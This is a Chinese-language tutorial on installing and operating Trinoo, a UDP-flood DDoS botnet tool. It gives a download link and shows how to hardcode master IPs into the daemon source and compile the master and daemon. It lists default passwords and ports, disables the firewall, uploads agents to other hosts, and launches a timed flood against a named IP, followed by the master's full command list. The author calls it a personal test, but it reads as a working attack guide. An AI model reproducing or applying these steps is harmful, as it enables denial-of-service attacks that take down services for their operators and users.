Trinoo 安装与使用 目录 Trinoo 安装与使用.....................................................................................................................1 一．什么是 Trinoo ...................................................................................................... 1 二.Trinoo 攻击原理......................................................................................................1 三．Trinoo 安装过程...................................................................................................2 四．攻击测试..............................................................................................................3 一．什么是 Trinoo Trinoo 是基于 UDPflood 的攻击软件，它向被攻击目标主机随机端口发送全零的 4 字节 UDP 包，被攻击主机的网络性能在处理这些超出其处理能力垃圾数据包的过程中不断下降， 直至不能提供正常服务甚至崩溃。 二.Trinoo 攻击原理 Trinoo 网络由主服务器（master）和 trinoo 守护程序（ns）组成。一个典型的 trinoo 网 络结构如下： 

1:攻击守护进程(NS) 2:攻击控制进程(MASTER) 3:客户端(NC，标准 TELNET 程序等)， 攻击守护进程 NS 是真正实施攻击的程序，它一般和攻击控制进程(MASTER)所在主机分 离，在原始 C 文件 ns.c 编译的时候，需要加入可控制其执行的攻击控制进程 MASTER 所在主 机 IP, ns 运行时，会首先向攻击控制进程(MASTER)所在主机的 31335 端口发送内容为 HELLO 的 UDP 包，标示它自身的存在，随后攻击守护进程即处于对端口 27444 的侦听状态，等待 master 攻击指令的到来。 攻击控制进程(MASTER)在收到攻击守护进程的 HELLO 包后，会在自己所在目录生成一 个加密的名为...的可利用主机表文件，MASTER 的启动是需要密码的，在正确输入默认密码 gOrave 后，MASTER 即成功启动，它一方面侦听端口 31335，等待攻击守护进程的 HELLO 包， 另一方面侦听端口 27665，等待客户端对其的连接。当客户端连接成功并发出指令时， MASTER 所在主机将向攻击守护进程 ns 所在主机的 27444 端口传递指令。 客户端不是 trinoo 自带的一部分，可用标准的能提供 TCP 连接的程序，如 TELNET，NETCAT 等，连接 MASTER 所在主机的 27665 端口，输入默认密码 betaalmostdone 后，即完成了连 接工作，进入攻击控制可操作的提示状态。 三．Trinoo 安装过程 /#解压软件包 tfn2k.tar trinoo trinoo.tar 1.下载 Trinoo.tar http://download.csdn.net/detail/colgcolg/4567879 2.解压 ftn2k.tar [root@localhost lzj]# tar zxf trinoo.tar [root@localhost lzj]# ls tfn2k [root@localhost lzj]# cd trinoo [root@localhost trinoo]# ls BENSUQS daemon master password 3.修改文件 主要修改 ns.c 文件 把 MASTER 所在主机 IP 加到 ns.c 里 用 vi 打开 ./ daemon/ns.c 文件 把 IP 下入下面代码里 /* #define PROCNAME "httpd" */ char *master[] = { "127.0.0.1", "10.88.1.1", "10.88.1.20", NULL }; 4.编译 master 程序 root@localhost trinoo]# cd master/ [root@localhost master]# make /#编译 c 文件 

编译完成后生成 master 可执行文件 5.编译 [root@localhost master]# cd ../daemon/ [root@localhost daemon]# gcc ns.c [root@localhost daemon]# 会生成一个可执行文件， –lcrypt /#通过 gcc 编译 c 文件 可以把 a.out 文件上传到代理主机上，因为我只是测试，就让自己的自己又当控制端， 又当代理端就可以了。 [root@localhost src]# [root@localhost src]# ./a.out 运行 a.out ，这样你就拥有一个代理了。 四．攻击测试 1.在控制端上： [root@localhost daemon]# cd ../master/ [root@localhost master]# [root@localhost master]# ./master ?? gOrave trinoo v1.07d2+f3+c [Sep 13 2012:19:25:20] [root@localhost master]# 在客户端上通过 telnent 连接控制机， telnet 10.88.1.20 27665 /#运行密码 /#运行控制进程 master /#如果连接不成功，把 linux 防火墙关了，或者把相应端口开 放。 iptables stop 暂时关闭防火墙 service chkconfig iptables off 重启后不再启动 iptables betaalmostdone /#登陆密码 trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] /#运行成功 trinoo> trinoo> trinoo> mping mping: Sending a PING to every Bcasts. trinoo> PONG 1 Received from 127.0.0.1 /# (我们首先来监测一下各个攻击守护进程是否成功启动) 

PONG 2 Received from 10.88.1.20 /# (成功响应) trinoo> 2.简单的进行一下攻击 /#设置攻击时间 trinoo> mtimer 300 mtimer: Setting timer on bcast to 300. trinoo> trinoo> dos 10.88.1.37 /#被攻击主机 IP DoS: Packeting 10.88.1.37. trinoo> 这样攻击就开始了 去被攻击主机抓包看看: 每秒 8w 多个包， rinoo 主服务器支持以下命令： die 关闭主服务器 quit 退出主服务器登录 mtimer N 设置 DoS 定时器为 N 秒。N 的取值范围从 1 到 1999 秒。如果 N<1，2000， 则使用缺省值 500。 dos IP DoS 攻击目标 IP 地址。命令"aaa 144adsl IP"被发送到每一个 守护程序（Bcast 主机），通知它们攻击指定的 IP 地址。 mdie pass 如果口令验证通过，则停止所有广播（Bcast）主机。命令 "d1e 144adsl"被发送到每一个广播主机，使它们停止。此命 令需要一个单独的口令。 mping 发送 PING 命令"png 144adsl"到每一台已激活的广播主机。 mdos 

向每一个广播主机发送多 DoS 攻击命令 （"xyz 144adsl 123:ip1:ip2:ip3"）。 info 打印版本和编译信息。如： This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c Compiled 15:08:41 Aug 16 1999 msize 设置 DoS 攻击时使用的数据包缓冲区大小。 nslookup host 对指定的主机进行域名查询。 killdead 尝试清除死锁的广播主机。首先向所有已知的广播主机发送 "shi l44adsl"命令。（任何处于激活状态的守护程序会回 送初始化字符串"*HELLO*"。）然后（通过-b 参数）修改广 播主机清单文件名字。这样当"*HELLO*"包被接收后能够重 新初始化。 usebackup 切换到由"killdead"命令建立的广播主机备份文件。 bcast 列出所有激活的广播主机。 help [cmd] 服务器或命令的帮助信息， mstop 试图停止一个 DoS 攻击（此现在尚未实现，但在 help 命令中列出。） 守护程序命令